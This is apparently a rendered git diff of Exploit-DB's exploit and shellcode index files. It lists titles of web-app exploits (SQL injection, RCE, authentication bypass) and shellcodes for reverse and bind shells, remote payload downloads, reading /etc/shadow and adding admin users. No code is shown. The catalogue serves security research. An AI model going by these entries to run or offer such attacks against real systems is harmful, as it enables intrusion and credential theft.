50248,exploits/php/webapps/50248.txt,"Dolibarr ERP/CRM 14.0.1 - Privilege Escalation",1970-01-01,"Vishwaraj Bhattrai",webapps,php, 50248,exploits/php/webapps/50248.txt,"Dolibarr ERP/CRM 14.0.1 - Privilege Escalation",1970-01-01,"Vishwaraj Bhattrai",webapps,php,
50249,exploits/php/webapps/50249.txt,"OpenSIS Community 8.0 - 'cp_id_miss_attn' SQL Injection",1970-01-01,"Eric Salario",webapps,php, 50249,exploits/php/webapps/50249.txt,"OpenSIS Community 8.0 - 'cp_id_miss_attn' SQL Injection",1970-01-01,"Eric Salario",webapps,php,
50250,exploits/hardware/webapps/50250.txt,"Compro Technology IP Camera - 'killps.cgi' Denial-of-Service (DoS)",1970-01-01,icekam,webapps,hardware,
50251,exploits/hardware/webapps/50251.txt,"Compro Technology IP Camera - RTSP stream disclosure (Unauthenticated)",1970-01-01,icekam,webapps,hardware, 50251,exploits/hardware/webapps/50251.txt,"Compro Technology IP Camera - RTSP stream disclosure (Unauthenticated)",1970-01-01,icekam,webapps,hardware,
50252,exploits/hardware/webapps/50252.txt,"Compro Technology IP Camera - 'Multiple' Credential Disclosure",1970-01-01,icekam,webapps,hardware, 50252,exploits/hardware/webapps/50252.txt,"Compro Technology IP Camera - 'Multiple' Credential Disclosure",1970-01-01,icekam,webapps,hardware,
50253,exploits/hardware/webapps/50253.txt,"Compro Technology IP Camera - ' index_MJpeg.cgi' Stream Disclosure",1970-01-01,icekam,webapps,hardware, 50253,exploits/hardware/webapps/50253.txt,"Compro Technology IP Camera - ' index_MJpeg.cgi' Stream Disclosure",1970-01-01,icekam,webapps,hardware,
50256,exploits/php/webapps/50256.txt,"WordPress Plugin Duplicate Page 4.4.1 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Nikhil Kapoor",webapps,php, 50256,exploits/php/webapps/50256.txt,"WordPress Plugin Duplicate Page 4.4.1 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Nikhil Kapoor",webapps,php,
50254,exploits/hardware/webapps/50254.txt,"Compro Technology IP Camera - ' mjpegStreamer.cgi' Screenshot Disclosure",1970-01-01,icekam,webapps,hardware, 50254,exploits/hardware/webapps/50254.txt,"Compro Technology IP Camera - ' mjpegStreamer.cgi' Screenshot Disclosure",1970-01-01,icekam,webapps,hardware,
50255,exploits/multiple/webapps/50255.txt,"WPanel 4.3.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Sentinal920,webapps,multiple, 50255,exploits/multiple/webapps/50255.txt,"WPanel 4.3.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Sentinal920,webapps,multiple,
50259,exploits/php/webapps/50259.txt,"OpenSIS 8.0 'modname' - Directory/Path Traversal",1970-01-01,"Eric Salario",webapps,php,
50260,exploits/php/webapps/50260.txt,"OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR)",1970-01-01,"Allen Enosh Upputori",webapps,php, 50260,exploits/php/webapps/50260.txt,"OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR)",1970-01-01,"Allen Enosh Upputori",webapps,php,
50262,exploits/php/webapps/50262.py,"FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Mason Soroka-Gill",webapps,php, 50262,exploits/php/webapps/50262.py,"FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Mason Soroka-Gill",webapps,php,
50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",1970-01-01,sudoninja,webapps,php, 50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",1970-01-01,sudoninja,webapps,php,
50264,exploits/php/webapps/50264.py,"Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload & Remote Code Execution (RCE)",1970-01-01,a-rey,webapps,php, 50264,exploits/php/webapps/50264.py,"Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload & Remote Code Execution (RCE)",1970-01-01,a-rey,webapps,php,
50265,exploits/php/webapps/50265.py,"Patient Appointment Scheduler System 1.0 - Persistent/Stored XSS",1970-01-01,a-rey,webapps,php,
50267,exploits/multiple/webapps/50267.txt,"Antminer Monitor 0.5.0 - Authentication Bypass",1970-01-01,Vulnz,webapps,multiple, 50267,exploits/multiple/webapps/50267.txt,"Antminer Monitor 0.5.0 - Authentication Bypass",1970-01-01,Vulnz,webapps,multiple,
50268,exploits/php/webapps/50268.txt,"WordPress Plugin WP Sitemap Page 1.6.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Nikhil Kapoor",webapps,php, 50268,exploits/php/webapps/50268.txt,"WordPress Plugin WP Sitemap Page 1.6.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Nikhil Kapoor",webapps,php,
50269,exploits/php/webapps/50269.py,"WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)",1970-01-01,"Mohin Paramasivam",webapps,php, 50269,exploits/php/webapps/50269.py,"WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)",1970-01-01,"Mohin Paramasivam",webapps,php,
@ -44423,7 +44354,6 @@ id,file,description,date,author,type,platform,port
50285,exploits/hardware/webapps/50285.txt,"ECOA Building Automation System - Local File Disclosure",1970-01-01,Neurogenesia,webapps,hardware, 50285,exploits/hardware/webapps/50285.txt,"ECOA Building Automation System - Local File Disclosure",1970-01-01,Neurogenesia,webapps,hardware,
50286,exploits/hardware/webapps/50286.txt,"ECOA Building Automation System - Arbitrary File Deletion",1970-01-01,Neurogenesia,webapps,hardware, 50286,exploits/hardware/webapps/50286.txt,"ECOA Building Automation System - Arbitrary File Deletion",1970-01-01,Neurogenesia,webapps,hardware,
50287,exploits/php/webapps/50287.py,"Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload",1970-01-01,spacehen,webapps,php, 50287,exploits/php/webapps/50287.py,"Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload",1970-01-01,spacehen,webapps,php,
50288,exploits/php/webapps/50288.py,"Apartment Visitor Management System (AVMS) 1.0 - SQLi to RCE",1970-01-01,mari0x00,webapps,php,
50292,exploits/php/webapps/50292.py,"Purchase Order Management System 1.0 - Remote File Upload",1970-01-01,"Aryan Chehreghani",webapps,php, 50292,exploits/php/webapps/50292.py,"Purchase Order Management System 1.0 - Remote File Upload",1970-01-01,"Aryan Chehreghani",webapps,php,
50298,exploits/php/webapps/50298.py,"ImpressCMS 1.4.2 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php, 50298,exploits/php/webapps/50298.py,"ImpressCMS 1.4.2 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
50294,exploits/php/webapps/50294.txt,"Support Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated)",1970-01-01,"John Jefferson Li",webapps,php, 50294,exploits/php/webapps/50294.txt,"Support Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated)",1970-01-01,"John Jefferson Li",webapps,php,
@ -44457,7 +44387,6 @@ id,file,description,date,author,type,platform,port
50329,exploits/php/webapps/50329.txt,"Pharmacy Point of Sale System 1.0 - SQLi Authentication BYpass",1970-01-01,"Janik Wehrli",webapps,php, 50329,exploits/php/webapps/50329.txt,"Pharmacy Point of Sale System 1.0 - SQLi Authentication BYpass",1970-01-01,"Janik Wehrli",webapps,php,
50333,exploits/php/webapps/50333.txt,"WordPress Plugin Wappointment 2.2.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Renos Nikolaou",webapps,php, 50333,exploits/php/webapps/50333.txt,"WordPress Plugin Wappointment 2.2.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Renos Nikolaou",webapps,php,
50334,exploits/php/webapps/50334.txt,"Library System 1.0 - 'student_id' SQL injection (Authenticated)",1970-01-01,"Vinay Bhuria",webapps,php, 50334,exploits/php/webapps/50334.txt,"Library System 1.0 - 'student_id' SQL injection (Authenticated)",1970-01-01,"Vinay Bhuria",webapps,php,
50338,exploits/hardware/webapps/50338.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,webapps,hardware,
50339,exploits/hardware/webapps/50339.txt,"FatPipe Networks WARP 10.2.2 - Authorization Bypass",1970-01-01,LiquidWorm,webapps,hardware, 50339,exploits/hardware/webapps/50339.txt,"FatPipe Networks WARP 10.2.2 - Authorization Bypass",1970-01-01,LiquidWorm,webapps,hardware,
50340,exploits/hardware/webapps/50340.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware, 50340,exploits/hardware/webapps/50340.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
50341,exploits/hardware/webapps/50341.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)",1970-01-01,LiquidWorm,webapps,hardware, 50341,exploits/hardware/webapps/50341.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)",1970-01-01,LiquidWorm,webapps,hardware,
@ -44471,14 +44400,11 @@ id,file,description,date,author,type,platform,port
50350,exploits/php/webapps/50350.txt,"WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php, 50350,exploits/php/webapps/50350.txt,"WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
50352,exploits/php/webapps/50352.txt,"OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)",1970-01-01,"Eric Salario",webapps,php, 50352,exploits/php/webapps/50352.txt,"OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)",1970-01-01,"Eric Salario",webapps,php,
50353,exploits/php/webapps/50353.php,"Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Mr.Gedik,webapps,php, 50353,exploits/php/webapps/50353.php,"Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Mr.Gedik,webapps,php,
50354,exploits/php/webapps/50354.py,"Wordpress Plugin JS Jobs Manager 1.1.7 - Unauthenticated Plugin Install/Activation",1970-01-01,spacehen,webapps,php,
50355,exploits/php/webapps/50355.txt,"Cyber Cafe Management System Project (CCMS) 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php, 50355,exploits/php/webapps/50355.txt,"Cyber Cafe Management System Project (CCMS) 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php,
50356,exploits/php/webapps/50356.py,"Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,pussycat0x,webapps,php, 50356,exploits/php/webapps/50356.py,"Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,pussycat0x,webapps,php,
50357,exploits/php/webapps/50357.txt,"Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)",1970-01-01,Murat,webapps,php, 50357,exploits/php/webapps/50357.txt,"Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)",1970-01-01,Murat,webapps,php,
50359,exploits/multiple/webapps/50359.txt,"PlaceOS 1.2109.1 - Open Redirection",1970-01-01,"Hamza Khedr",webapps,multiple,
50360,exploits/php/webapps/50360.txt,"Exam Form Submission System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php, 50360,exploits/php/webapps/50360.txt,"Exam Form Submission System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php,
50361,exploits/php/webapps/50361.txt,"Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping",1970-01-01,"Cristian \'void\' Giustini",webapps,php, 50361,exploits/php/webapps/50361.txt,"Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping",1970-01-01,"Cristian \'void\' Giustini",webapps,php,
50362,exploits/php/webapps/50362.txt,"Blood Bank System 1.0 - SQL Injection / Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php,
50363,exploits/php/webapps/50363.txt,"Phpwcms 1.9.30 - File Upload to XSS",1970-01-01,"Okan Kurtulus",webapps,php, 50363,exploits/php/webapps/50363.txt,"Phpwcms 1.9.30 - File Upload to XSS",1970-01-01,"Okan Kurtulus",webapps,php,
50364,exploits/php/webapps/50364.py,"Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Ghuliev,webapps,php, 50364,exploits/php/webapps/50364.py,"Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Ghuliev,webapps,php,
50365,exploits/php/webapps/50365.txt,"Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php, 50365,exploits/php/webapps/50365.txt,"Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php,
@ -44486,7 +44412,6 @@ id,file,description,date,author,type,platform,port
50367,exploits/php/webapps/50367.py,"CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php, 50367,exploits/php/webapps/50367.py,"CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
50370,exploits/php/webapps/50370.txt,"Directory Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php, 50370,exploits/php/webapps/50370.txt,"Directory Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php,
50371,exploits/multiple/webapps/50371.txt,"Payara Micro Community 5.2021.6 - Directory Traversal",1970-01-01,"Yasser Khan",webapps,multiple, 50371,exploits/multiple/webapps/50371.txt,"Payara Micro Community 5.2021.6 - Directory Traversal",1970-01-01,"Yasser Khan",webapps,multiple,
50372,exploits/php/webapps/50372.txt,"Lodging Reservation Management System 1.0 - SQL Injection / Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php,
50373,exploits/multiple/webapps/50373.py,"Open Game Panel - Remote Code Execution (RCE) (Authenticated)",1970-01-01,prey,webapps,multiple, 50373,exploits/multiple/webapps/50373.py,"Open Game Panel - Remote Code Execution (RCE) (Authenticated)",1970-01-01,prey,webapps,multiple,
50374,exploits/php/webapps/50374.txt,"Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Jordan Glover",webapps,php, 50374,exploits/php/webapps/50374.txt,"Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Jordan Glover",webapps,php,
50375,exploits/php/webapps/50375.txt,"Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS)",1970-01-01,"Jordan Glover",webapps,php, 50375,exploits/php/webapps/50375.txt,"Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS)",1970-01-01,"Jordan Glover",webapps,php,
@ -44494,7 +44419,6 @@ id,file,description,date,author,type,platform,port
50377,exploits/java/webapps/50377.txt,"Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read",1970-01-01,"Mayank Deshmukh",webapps,java, 50377,exploits/java/webapps/50377.txt,"Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read",1970-01-01,"Mayank Deshmukh",webapps,java,
50378,exploits/php/webapps/50378.py,"Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)",1970-01-01,spacehen,webapps,php, 50378,exploits/php/webapps/50378.py,"Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)",1970-01-01,spacehen,webapps,php,
50379,exploits/php/webapps/50379.py,"Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload",1970-01-01,spacehen,webapps,php, 50379,exploits/php/webapps/50379.py,"Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload",1970-01-01,spacehen,webapps,php,
50380,exploits/multiple/webapps/50380.txt,"Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read",1970-01-01,"Mayank Deshmukh",webapps,multiple,
50381,exploits/multiple/webapps/50381.txt,"Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection",1970-01-01,"Emel Basayar",webapps,multiple, 50381,exploits/multiple/webapps/50381.txt,"Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection",1970-01-01,"Emel Basayar",webapps,multiple,
50382,exploits/php/webapps/50382.py,"Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure",1970-01-01,"Ron Jost",webapps,php, 50382,exploits/php/webapps/50382.py,"Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure",1970-01-01,"Ron Jost",webapps,php,
50383,exploits/multiple/webapps/50383.sh,"Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)",1970-01-01,"Lucas Souza",webapps,multiple, 50383,exploits/multiple/webapps/50383.sh,"Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)",1970-01-01,"Lucas Souza",webapps,multiple,

Can't render this file because it is too large.

12
files_shellcodes.csv
View file

@ -1,7 +1,5 @@
id,file,description,date,author,type,platform id,file,description,date,author,type,platform
14113,shellcodes/arm/14113.c,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",1970-01-01,"Jonathan Salwan",shellcode,arm 14113,shellcodes/arm/14113.c,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",1970-01-01,"Jonathan Salwan",shellcode,arm
49442,shellcodes/linux/49442.c,"Linux/x64 - Reverse (127.1.1.1:4444/TCP) Shell (/bin/sh) Shellcode (123 Bytes)",1970-01-01,"Guillem Alminyana",shellcode,linux
49446,shellcodes/linux_x86/49446.c,"Linux/x86 - Bind Socat (0.0.0.0:1000/TCP) Shell (Bash) Shellcode (113 bytes)",1970-01-01,"Felipe Winsnes",shellcode,linux_x86
13241,shellcodes/aix/13241.c,"AIX - execve(/bin/sh) Shellcode (88 bytes)",1970-01-01,"Georgi Guninski",shellcode,aix 13241,shellcodes/aix/13241.c,"AIX - execve(/bin/sh) Shellcode (88 bytes)",1970-01-01,"Georgi Guninski",shellcode,aix
13242,shellcodes/bsd/13242.txt,"BSD - Reverse (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes)",1970-01-01,Scrippie,shellcode,bsd 13242,shellcodes/bsd/13242.txt,"BSD - Reverse (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes)",1970-01-01,Scrippie,shellcode,bsd
13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve(/bin/sh) Shellcode (128 bytes)",1970-01-01,Palante,shellcode,bsd_ppc 13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve(/bin/sh) Shellcode (128 bytes)",1970-01-01,Palante,shellcode,bsd_ppc
@ -1027,20 +1025,10 @@ id,file,description,date,author,type,platform
48592,shellcodes/linux_x86/48592.c,"Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,linux_x86 48592,shellcodes/linux_x86/48592.c,"Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,linux_x86
48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",1970-01-01,danf42,shellcode,linux_x86 48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",1970-01-01,danf42,shellcode,linux_x86
48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)",1970-01-01,"Siddharth Sharma",shellcode,windows_x86 48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)",1970-01-01,"Siddharth Sharma",shellcode,windows_x86
49416,shellcodes/linux/49416.txt,"Linux/x86 - Bind (0.0.0.0:13377/TCP) Shell (/bin/sh) Shellcode (65 bytes)",1970-01-01,ac3,shellcode,linux
49466,shellcodes/windows_x86/49466.asm,"Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes)",1970-01-01,"Armando Huesca Prida",shellcode,windows_x86
49472,shellcodes/linux/49472.c,"Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)",1970-01-01,"Guillem Alminyana",shellcode,linux
49547,shellcodes/linux_x86-64/49547.c,"Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes)",1970-01-01,"Felipe Winsnes",shellcode,linux_x86-64
49592,shellcodes/windows_x86/49592.asm,"Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)",1970-01-01,"Armando Huesca Prida",shellcode,windows_x86
49768,shellcodes/linux_x86/49768.c,"Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)",1970-01-01,s1ege,shellcode,linux_x86 49768,shellcodes/linux_x86/49768.c,"Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)",1970-01-01,s1ege,shellcode,linux_x86
49770,shellcodes/linux_x86-64/49770.c,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2)",1970-01-01,s1ege,shellcode,linux_x86-64 49770,shellcodes/linux_x86-64/49770.c,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2)",1970-01-01,s1ege,shellcode,linux_x86-64
49819,shellcodes/windows_x86-64/49819.c,"Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)",1970-01-01,boku,shellcode,windows_x86-64
49820,shellcodes/windows_x86-64/49820.c,"Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes)",1970-01-01,boku,shellcode,windows_x86-64
49855,shellcodes/linux_x86/49855.c,"Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes)",1970-01-01,"Artur Szymczak",shellcode,linux_x86 49855,shellcodes/linux_x86/49855.c,"Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes)",1970-01-01,"Artur Szymczak",shellcode,linux_x86
49976,shellcodes/linux_x86/49976.c,"Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded)",1970-01-01,d7x,shellcode,linux_x86
50124,shellcodes/linux_x86/50124.c,"Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)",1970-01-01,d7x,shellcode,linux_x86 50124,shellcodes/linux_x86/50124.c,"Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)",1970-01-01,d7x,shellcode,linux_x86
50125,shellcodes/linux_x86/50125.c,"Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)",1970-01-01,d7x,shellcode,linux_x86 50125,shellcodes/linux_x86/50125.c,"Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)",1970-01-01,d7x,shellcode,linux_x86
50141,shellcodes/linux_x86/50141.c,"Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode",1970-01-01,d7x,shellcode,linux_x86 50141,shellcodes/linux_x86/50141.c,"Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode",1970-01-01,d7x,shellcode,linux_x86
50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64 50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64
50368,shellcodes/windows_x86/50368.c,"Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86
50384,shellcodes/windows_x86/50384.c,"Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86

1 id file description date author type platform
2 14113 shellcodes/arm/14113.c Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes) 1970-01-01 Jonathan Salwan shellcode arm
49442 shellcodes/linux/49442.c Linux/x64 - Reverse (127.1.1.1:4444/TCP) Shell (/bin/sh) Shellcode (123 Bytes) 1970-01-01 Guillem Alminyana shellcode linux
49446 shellcodes/linux_x86/49446.c Linux/x86 - Bind Socat (0.0.0.0:1000/TCP) Shell (Bash) Shellcode (113 bytes) 1970-01-01 Felipe Winsnes shellcode linux_x86
3 13241 shellcodes/aix/13241.c AIX - execve(/bin/sh) Shellcode (88 bytes) 1970-01-01 Georgi Guninski shellcode aix
4 13242 shellcodes/bsd/13242.txt BSD - Reverse (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes) 1970-01-01 Scrippie shellcode bsd
5 13243 shellcodes/bsd_ppc/13243.c BSD/PPC - execve(/bin/sh) Shellcode (128 bytes) 1970-01-01 Palante shellcode bsd_ppc
1025 48592 shellcodes/linux_x86/48592.c Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes) 1970-01-01 Xenofon Vassilakopoulos shellcode linux_x86
1026 48703 shellcodes/linux_x86/48703.c Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes) 1970-01-01 danf42 shellcode linux_x86
1027 48718 shellcodes/windows_x86/48718.c Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes) 1970-01-01 Siddharth Sharma shellcode windows_x86
49416 shellcodes/linux/49416.txt Linux/x86 - Bind (0.0.0.0:13377/TCP) Shell (/bin/sh) Shellcode (65 bytes) 1970-01-01 ac3 shellcode linux
49466 shellcodes/windows_x86/49466.asm Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes) 1970-01-01 Armando Huesca Prida shellcode windows_x86
49472 shellcodes/linux/49472.c Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes) 1970-01-01 Guillem Alminyana shellcode linux
49547 shellcodes/linux_x86-64/49547.c Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes) 1970-01-01 Felipe Winsnes shellcode linux_x86-64
49592 shellcodes/windows_x86/49592.asm Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes) 1970-01-01 Armando Huesca Prida shellcode windows_x86
1028 49768 shellcodes/linux_x86/49768.c Linux/x86 - execve(/bin/sh) Shellcode (17 bytes) 1970-01-01 s1ege shellcode linux_x86
1029 49770 shellcodes/linux_x86-64/49770.c Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2) 1970-01-01 s1ege shellcode linux_x86-64
49819 shellcodes/windows_x86-64/49819.c Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes) 1970-01-01 boku shellcode windows_x86-64
49820 shellcodes/windows_x86-64/49820.c Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes) 1970-01-01 boku shellcode windows_x86-64
1030 49855 shellcodes/linux_x86/49855.c Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes) 1970-01-01 Artur Szymczak shellcode linux_x86
49976 shellcodes/linux_x86/49976.c Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded) 1970-01-01 d7x shellcode linux_x86
1031 50124 shellcodes/linux_x86/50124.c Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes) 1970-01-01 d7x shellcode linux_x86
1032 50125 shellcodes/linux_x86/50125.c Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes) 1970-01-01 d7x shellcode linux_x86
1033 50141 shellcodes/linux_x86/50141.c Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode 1970-01-01 d7x shellcode linux_x86
1034 50291 shellcodes/windows_x86-64/50291.c Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes) 1970-01-01 Xenofon Vassilakopoulos shellcode windows_x86-64
50368 shellcodes/windows_x86/50368.c Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes) 1970-01-01 Daniel Ortiz shellcode windows_x86
50384 shellcodes/windows_x86/50384.c Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes) 1970-01-01 Daniel Ortiz shellcode windows_x86

35
shellcodes/linux/49416.txt
View file

@ -1,35 +0,0 @@
# Exploit Title: Linux/x86 - bind shell on port 13377 Shellcode (65 bytes)
# Date: Jan 12, 2021
# Exploit Author: ac3
